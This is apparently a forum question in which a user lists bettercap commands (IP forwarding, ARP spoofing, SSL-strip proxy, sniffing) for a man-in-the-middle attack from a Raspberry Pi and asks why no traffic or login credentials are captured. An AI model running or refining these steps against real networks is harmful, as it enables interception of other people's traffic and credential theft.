I've been attempting to perform an SSL strip MITM attack with my Rasberry pi 4B 4GB running kali Linux. after loading all the required modules in better cap and navigating to a website without HSTS on my target machine I'm not seeing the traffic show up much less the login credentials.
Commands I'm entering:
echo 1 > /proc/sys/net/ipv4/ip_forward ...
bettercap -iface wlan0 ...
set https.proxy.sslstrip true ...
https.proxy on ...
set arp.spoof.targets (Target IP) ...
arp.spoof on ...
net.sniff on ...
I should also mention that bettercap is frequently and continuously detecting and then losing new endpoints. I've tried navigating to the website on my target machine while it's detected the right endpoint and before it loses it to no avail. I've been able to use arpspoof and urlsnarf to successfully monitor HTTP traffic before in my MITM attack without SSL strip.
Asked by MichaelPV
(93 rep)
Oct 26, 2019, 10:54 PM
Last activity: Jul 11, 2025, 02:10 PM
Last activity: Jul 11, 2025, 02:10 PM